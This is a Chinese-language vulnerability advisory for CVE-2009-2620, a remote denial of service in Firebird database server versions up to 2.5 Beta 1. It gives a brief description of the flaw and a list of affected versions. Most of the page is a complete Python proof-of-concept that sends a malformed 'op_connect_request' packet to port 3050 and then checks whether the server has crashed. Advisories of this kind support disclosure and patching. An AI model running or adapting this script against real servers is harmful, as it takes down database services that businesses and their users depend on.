Firebird 'op_connect_request'远程拒绝服务漏洞

2009-07-2900:00:00

Root

www.seebug.org

0.541 Medium

EPSS

Percentile

97.3%

JSON

Bugraq ID: 35842
CVE ID：CVE-2009-2620

Firebird是一款流行的数据库程序。
Firebird不正确处理包含非法数据的’op_connect_request’消息，远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。
发送非法的数据长度超过或等于12字节的’op_connect_request’消息到默认的3050端口可触发此漏洞，导致应用服务程序崩溃，造成拒绝服务攻击。

Firebird Firebird 2.1.3 RC1
Firebird Firebird 2.1.2
Firebird Firebird 2.1.1
Firebird Firebird 2.0.5
Firebird Firebird 2.0.1
Firebird Firebird 1.5.5
Firebird Firebird 2.5 Beta 1
厂商解决方案
用户可参考Firebird CVS库获得更新程序：
http://www.firebirdsql.org/


                                                import socket
import time
def attack(host, port):
    op_connect_request = '\x35'     # Request to establish connection
    packet  = '\x00\x00\x00' + op_connect_request
    packet += &quot;A&quot; * 12              #Invalid data, must be &gt;= 12 bytes in order to trigger the DoS
    print &quot;(+) Connecting to the server....&quot;
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print &quot;(+) Sending op_connect_request packet...&quot;
    s.send(str(packet))
    s.close()
    print &quot;(+) op_connect_request packet successfully sent.&quot;
    #Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
    print &quot;(+) Waiting 10 seconds before trying to reconnect to the server...&quot;
    time.sleep(10)
    try:
        print &quot;(+) Trying to reconnect...&quot;
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.close()
        print &quot;(!) Something went wrong. The server is still alive.&quot;
    except socket.error:
        print &quot;(*) Attack successful. The server is down.&quot;
port = 3050
host = '192.168.131.128'            #Replace with your target host
attack(host, port)